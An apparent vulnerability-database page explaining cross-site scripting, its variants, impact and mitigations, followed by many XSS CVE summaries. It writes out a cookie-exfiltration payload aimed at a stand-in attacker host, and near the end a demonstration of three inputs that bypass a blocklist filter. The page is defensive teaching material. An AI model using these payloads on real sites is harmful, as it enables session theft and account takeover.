Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

The attacker supplies input that contains script, or HTML that causes script to run (an event-handler attribute, a javascript: URL), and the application incorporates it verbatim into its HTML response. When a victim's browser renders that response it cannot distinguish the injected code from the site's own, so the script runs with every privilege of the site's origin.

The attack manifests in three main variants. Reflected XSS occurs when the malicious script arrives in the request (a query parameter such as a search term, a path segment, a header the page echoes) and is returned in the immediate response; the victim has to be lured into sending that request, typically through a phishing link. Stored XSS is more dangerous: the payload persists in the application's data store (comment fields, user profiles, forum posts, file names) and fires for every user who views the affected content, with no per-victim lure required. DOM-based XSS happens entirely client-side: page JavaScript reads attacker-controllable data (location.hash, location.search, document.referrer, postMessage data) and writes it to a dangerous sink such as innerHTML, document.write or eval, so the payload may never reach the server at all and leaves no trace in server logs.

A typical attack flow starts with the attacker identifying an injection point: anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims load the page, their browsers execute the script within the origin of the legitimate site, so it can read the DOM, read any cookie not flagged HttpOnly, and issue requests that carry the victim's session. In practice the injected one-liner is usually just a loader that pulls a larger script from the attacker's host.

Impact

  • Session hijacking: Steal session cookies that lack the HttpOnly flag, or simply drive the victim's existing session from the injected script without ever reading the cookie
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways was hit in 2018 by the Magecart skimming attack: attackers modified a JavaScript file served from the airline's own site so that the payment page loaded card-skimming code, and details from roughly 380,000 transactions were exposed. Strictly, the injection vector was a compromised script rather than an XSS bug in the application, but the outcome is exactly the capability XSS grants, attacker-controlled script running in the trusted origin, and it shows what that capability is worth against a payment page.

Mitigation

  • Context-aware output encoding: Encode at the point of output for the context the data lands in (HTML body, HTML attribute, JavaScript string, URL parameter, CSS value); a single generic escape routine is wrong for at least one of them. Rely on the template engine's auto-escaping and keep any "raw" output helper away from user data
  • Content Security Policy (CSP): Deploy a strict, nonce- or hash-based policy (script-src 'nonce-...' 'strict-dynamic'; object-src 'none'; base-uri 'none') so that injected inline or attacker-hosted scripts do not execute even when encoding fails. Host allowlists are the weaker form and are routinely bypassed through JSONP endpoints and open redirects on allowed hosts
  • HttpOnly and Secure cookie flags: HttpOnly keeps session cookies out of document.cookie and Secure restricts them to HTTPS. This blunts cookie theft but not XSS itself: injected script can still send requests that carry the victim's cookies, so treat the flags as damage limitation, not a fix
  • Input validation: Reject input that does not match the expected type, length and character set. This shrinks the attack surface but cannot replace output encoding, because safety depends on the output context the input eventually reaches, and blocklist filters are reliably bypassed (the Horilla entry below is one example)
  • DOM-based XSS prevention: Write user data with textContent, setAttribute or the URL API rather than innerHTML, outerHTML, document.write or insertAdjacentHTML; never pass it to eval, setTimeout with a string argument, new Function or location assignments; where rich HTML must be accepted, sanitize with an allowlist library such as DOMPurify and enforce the rule with Trusted Types (require-trusted-types-for 'script')

Recent CVEs (10032)

EPSS 0% CVSS 6.4
MEDIUM This Month

The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-rss-aggregator' shortcode in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'saswp_custom_schema_field' profile field in all versions up to, and including, 1.54 due to insufficient input sanitization and output escaping. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

The Uncanny Automator - Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. [CVSS 6.4 MEDIUM]

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

8180 Ip Audio Alerter Firmware versions up to 5.5 are affected by cross-site scripting (xss) (CVSS 6.1).

Golang XSS 8180 Ip Audio Alerter Firmware
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Microsoft Account has a cross-site scripting vulnerability allowing unauthenticated attackers to execute scripts in the context of Microsoft Account pages.

Microsoft XSS Account
NVD
EPSS 0% CVSS 4.7
MEDIUM This Month

A Cross-Site Scripting (XSS) vulnerability was identified in a parameter in Omada Controllers due to improper input sanitization. Exploitation requires advanced conditions, such as network positioning or emulating a trusted entity, and user interaction by an authenticated administrator.

XSS Oc200 Firmware Oc400 Firmware +3
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

WP Chill Gallery PhotoBlocks photoblocks-grid-gallery is affected by cross-site scripting (xss) (CVSS 6.5).

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting in bPlugins B Slider through version 2.0.6 enables authenticated attackers with network access to inject malicious scripts that execute in users' browsers. An attacker with user privileges can exploit improper input neutralization during web page generation to steal session tokens, perform unauthorized actions, or redirect victims to malicious sites. No patch is currently available for this vulnerability.

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

ThimPress LearnPress Course Review plugin through version 4.1.9 is vulnerable to stored cross-site scripting (XSS): insufficient input validation allows authenticated users to inject malicious scripts into course reviews. An attacker with user privileges can exploit this to execute arbitrary JavaScript in other users' browsers, potentially stealing session tokens or performing unauthorized actions on their behalf. No patch is currently available for this vulnerability.

XSS
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

favethemes Houzez Theme - Functionality houzez-theme-functionality is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting in PenciDesign Penci Shortcodes & Performance plugin versions 6.1 and earlier allows authenticated attackers to inject malicious scripts that execute in users' browsers. An attacker with user-level privileges can exploit improper input neutralization during page generation to steal session cookies, perform unauthorized actions, or deface content for affected users. No patch is currently available for this vulnerability.

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

WP Chill Modula Image Gallery modula-best-grid-gallery is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored XSS in Micro.company Form to Chat App versions up to 1.2.5 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data and stealing sensitive information. The vulnerability stems from insufficient input sanitization during form processing and requires user interaction to trigger. No patch is currently available for this medium-severity flaw.

XSS
NVD
EPSS 0% CVSS 5.9
MEDIUM This Month

Stored XSS in Owl Carousel WP through version 2.2.2 allows authenticated users with high privileges to inject malicious scripts that persist in web pages and execute in visitors' browsers. An attacker with administrative access could exploit improper input sanitization to compromise site visitor sessions or steal sensitive data. A patch is not currently available.

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored XSS in teachPress through version 9.0.12 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data and performing unauthorized actions within the application. The vulnerability requires user interaction to trigger and can affect multiple users across the application scope. No security patch is currently available for affected installations.

XSS
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

The Menu In Post plugin for Linux through version 1.4.1 contains a DOM-based cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts into web pages viewed by other users. An attacker with user-level access can exploit this to steal session tokens, deface content, or perform actions on behalf of victims. No patch is currently available for this vulnerability.

Linux XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

subhansanjaya Carousel Horizontal Posts Content Slider carousel-horizontal-posts-content-slider is affected by cross-site scripting (xss) (CVSS 6.5).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion allows attackers to inject malicious HTML into component descriptions that executes when users click the payload, enabling local file theft or arbitrary code execution on affected systems. The vulnerability requires user interaction and local access but carries high impact due to the ability to compromise the desktop application's security context. A patch is available for remediation.

XSS Fusion
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion allows attackers to inject malicious HTML into part attributes that executes when users interact with crafted files, potentially enabling local file access or arbitrary code execution. This desktop application vulnerability requires user interaction but can compromise system integrity through malicious file sharing. A patch is available.

XSS Fusion
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Stored XSS in Autodesk Fusion's design name field allows attackers to inject malicious HTML that executes when users view the delete confirmation dialog, potentially enabling arbitrary code execution or local file access on affected systems. An attacker must first craft a malicious design name that gets stored in the application, then socially engineer a user to interact with the deletion prompt to trigger the payload. A patch is available to address this vulnerability.

XSS Fusion
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Spa grandspa allows Reflected XSS. This issue affects Grand Spa: from n/a through <= 3.5.5. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Magazine grandmagazine allows Reflected XSS. This issue affects Grand Magazine: from n/a through <= 3.5.7. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hossni Mubarak JobWP jobwp allows Stored XSS. This issue affects JobWP: from n/a through <= 2.4.5. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in scriptsbundle CarSpot carspot allows Reflected XSS. This issue affects CarSpot: from n/a through < 2.4.6. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS. This issue affects TableOn: from n/a through <= 1.0.4.2. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS. This issue affects WP Test Email: from n/a through <= 1.1.7. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS. This issue affects Hide My WP: from n/a through <= 6.2.12. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Hotel Listing hotel-listing allows Reflected XSS. This issue affects Hotel Listing: from n/a through <= 1.4.0. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

highwarden Super Logos Showcase superlogoshowcase-wp is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

LambertGroup Universal Video Player universal-video-player is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

CridioStudio ListingPro Reviews listingpro-reviews is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

LambertGroup Universal Video Player universal-video-player is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS. This issue affects KenthaRadio: from n/a through <= 2.2.0. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS. This issue affects JNews - Video: from n/a through <= 11.0.2. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

jegtheme JNews - Frontend Submit jnews-frontend-submit is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows DOM-Based XSS. This issue affects Enfold: from n/a through <= 7.1.3. [CVSS 6.5 MEDIUM]

XSS
NVD
EPSS 0% CVSS 5.8
MEDIUM This Month

cjjparadoxmax Synergy Project Manager synergy-project-manager is affected by cross-site scripting (xss) (CVSS 5.8).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in shoutoutglobal ShoutOut shoutout allows Reflected XSS. This issue affects ShoutOut: from n/a through <= 4.0.2. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arevico WP Simple Redirect wp-simple-redirect allows Reflected XSS. This issue affects WP Simple Redirect: from n/a through <= 1.1. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
EPSS 0% CVSS 7.1
HIGH This Week

extremeidea bidorbuy Store Integrator bidorbuystoreintegrator is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS. This issue affects Dooodl: from n/a through <= 2.3.0. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS. This issue affects Dinatur: from n/a through <= 1.18. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS. This issue affects Infility Global: from n/a through <= 2.14.50. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

agmorpheus Syntax Highlighter Compress syntax-highlighter-compress is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Casey Bisson wpCAS wpcas allows Reflected XSS. This issue affects wpCAS: from n/a through <= 1.07. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frank Corso Quote Master quote-master allows Reflected XSS. This issue affects Quote Master: from n/a through <= 7.1.1. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Remi Corson Easy Theme Options easy-theme-options is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

expresstechsoftware MemberPress Discord Addon expresstechsoftwares-memberpress-discord-add-on is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in matiskiba Ravpage ravpage allows Reflected XSS. This issue affects Ravpage: from n/a through <= 2.33. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Craft craftcoffee allows DOM-Based XSS. This issue affects Craft: from n/a through <= 2.3.6. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods DotLife dotlife allows Reflected XSS. This issue affects DotLife: from n/a through < 4.9.5. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Hoteller hoteller allows Reflected XSS. This issue affects Hoteller: from n/a through < 6.8.9. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

codisto Omnichannel for WooCommerce codistoconnect is affected by cross-site scripting (xss) (CVSS 7.1).

WordPress XSS PHP
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dmytro Shteflyuk CodeColorer codecolorer allows Stored XSS. This issue affects CodeColorer: from n/a through <= 0.10.1. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

GLS GLS Shipping for WooCommerce gls-shipping-for-woocommerce is affected by cross-site scripting (xss) (CVSS 7.1).

WordPress XSS PHP
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in netgsm Netgsm netgsm allows Reflected XSS. This issue affects Netgsm: from n/a through <= 2.9.63. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mndpsingh287 WP Mail wp-mail allows Reflected XSS. This issue affects WP Mail: from n/a through <= 1.3. [CVSS 7.1 HIGH]

WordPress XSS PHP
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS. This issue affects My Post Order: from n/a through <= 1.2.1.1. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in favethemes Homey Core homey-core allows Reflected XSS. This issue affects Homey Core: from n/a through <= 2.4.3. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS. This issue affects WorkScout-Core: from n/a through <= 1.7.06. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout workscout allows Reflected XSS. This issue affects WorkScout: from n/a through <= 4.1.07. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Tour grandtour allows Reflected XSS. This issue affects Grand Tour: from n/a through < 5.6.2. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designingmedia Hostiko hostiko allows Reflected XSS. This issue affects Hostiko: from n/a through < 94.3.6. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

scriptsbundle AdForest Elementor adforest-elementor is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

wphocus My auctions allegro my-auctions-allegro-free-edition is affected by cross-site scripting (xss) (CVSS 7.1).

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS. This issue affects JetEngine: from n/a through <= 3.7.7. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CleverSoft Anon anon2x allows Reflected XSS. This issue affects Anon: from n/a through <= 2.2.10. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in foreverpinetree TheNa thena allows Reflected XSS. This issue affects TheNa: from n/a through <= 1.5.5. [CVSS 7.1 HIGH]

XSS
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

ThemeGoods Grand Restaurant Theme Elements for Elementor grandrestaurant-elementor is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
EPSS 0% CVSS 5.9
MEDIUM This Month

SEOSEON EUROPE S.L Affiliate Link Tracker affiliate-link-tracker is affected by cross-site scripting (xss) (CVSS 5.9).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

adamlabs WordPress Photo Gallery photo-gallery-portfolio is affected by cross-site scripting (xss) (CVSS 6.1).

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

flexostudio flexo-posts-manager flexo-posts-manager is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ayecode Restaurante restaurante allows Reflected XSS. This issue affects Restaurante: from n/a through <= 3.0.7. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes xSmart xsmart allows Reflected XSS. This issue affects xSmart: from n/a through <= 1.2.9.4. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tagDiv tagDiv Composer td-composer allows DOM-Based XSS. This issue affects tagDiv Composer: from n/a through <= 5.4.2. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pondol Pondol BBS pondol-bbs allows Stored XSS. This issue affects Pondol BBS: from n/a through <= 1.1.8.4. [CVSS 5.4 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ApusTheme Drone drone allows Reflected XSS. This issue affects Drone: from n/a through <= 1.40. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup Accordion Slider PRO accordion_slider_pro is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup xPromoter top_bar_promoter allows Reflected XSS. This issue affects xPromoter: from n/a through <= 1.3.4. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

highwarden Super Interactive Maps super-interactive-maps is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel is affected by cross-site scripting (xss) (CVSS 6.1).

WordPress XSS PHP
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS. This issue affects Magic Slider: from n/a through <= 2.2. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows Reflected XSS. This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in xtemos WoodMart woodmart allows Code Injection. This issue affects WoodMart: from n/a through <= 8.3.7. [CVSS 6.1 MEDIUM]

Code Injection XSS
NVD
EPSS 0% CVSS 5.4
MEDIUM This Month

Benjamin Intal Stackable stackable-ultimate-gutenberg-blocks is affected by cross-site scripting (xss) (CVSS 5.4).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS. This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5. [CVSS 6.1 MEDIUM]

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

LambertGroup HTML5 Video Player lbg-vp2-html5-bottom is affected by cross-site scripting (xss) (CVSS 6.1).

XSS
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim’s browser. [CVSS 6.1 MEDIUM]

XSS Quick.Cart
NVD
EPSS 0% CVSS 5.5
MEDIUM This Month

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows Reflected XSS. This issue affects Hotel Guest Hotspot: through 22012026. [CVSS 5.5 MEDIUM]

XSS Hotel Guest Hotspot
NVD
EPSS 0% CVSS 4.8
MEDIUM POC This Month

Horilla HRMS version 1.4.0 contains insufficient input validation in its XSS prevention function, allowing attackers to bypass protections through context-agnostic regex patterns. Public exploit code exists for this vulnerability, enabling attackers to redirect users to malicious sites, execute arbitrary JavaScript, and steal CSRF tokens for use in admin-targeted attacks. The vulnerability affects Horilla 1.4.0 and has been patched in version 1.5.0.

XSS CSRF Horilla
NVD GitHub
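The Horilla entry above describes a filter defeated by context-agnostic regex patterns. As an added example that is not part of the original page and is not Horilla's code, here is a constructed blocklist-regex "XSS filter" of that general kind together with three inputs that pass it, each for a different reason. The filter, the payloads and the assumed sink contexts are all assumptions made for this demonstration.

```javascript
// Added example (not from the page, and not Horilla's code): a constructed
// blocklist-regex XSS filter and three inputs that pass it. The filter,
// payloads and sink contexts are assumptions made for this demonstration.

// Strips <script>/<iframe> tags, the javascript: scheme and on*= handlers,
// and implicitly assumes every input ends up in the HTML body.
const BLOCKLIST = [
  /<\/?script[^>]*>/gi,
  /<\/?iframe[^>]*>/gi,
  /javascript\s*:/gi,
  /\bon\w+\s*=/gi,
];
function blocklistFilter(input) {
  let out = String(input);
  for (const re of BLOCKLIST) out = out.replace(re, '');
  return out;                       // one pass, no re-scan of the result
}

// What the browser does with an attribute value before using it as a URL:
// decode character references. Only the entity this demo needs is handled.
function attrDecode(s) { return s.replace(/&colon;/gi, ':'); }

// 1. Single-pass stripping is not idempotent: removing the inner tag
//    re-assembles the outer one.
const nested = '<scr<script>ipt>alert(1)</scr</script>ipt>';

// 2. The scheme check looks at the raw bytes, the browser looks at the decoded
//    attribute value. Lands in an href (or formaction) and fires on click.
const encodedScheme = '<a href="javascript&colon;alert(1)">open</a>';

// 3. Nothing tag-like at all, so nothing to strip; but if the sink is
//    <script>var q = '...'</script>, the quote ends the string literal.
const jsStringBreak = "'; alert(1); //";

function filterBypasses() {
  const afterNested = blocklistFilter(nested);
  const afterScheme = blocklistFilter(encodedScheme);
  const afterJs = blocklistFilter(jsStringBreak);
  return {
    nestedRebuildsScriptTag: afterNested === '<script>alert(1)</script>',
    schemeSurvivesDecoding: attrDecode(afterScheme).includes('javascript:alert(1)'),
    jsStringUntouched: afterJs === jsStringBreak,
  };
}

console.log(filterBypasses());   // all three true
```

Each case shows a different reason blocklists fail: the filter is not a parser (case 1), it sees a different representation than the browser does (case 2), and it does not know which output context the data will reach (case 3). Output encoding chosen per context, with a strict CSP behind it, does not have any of these problems.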

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
10032

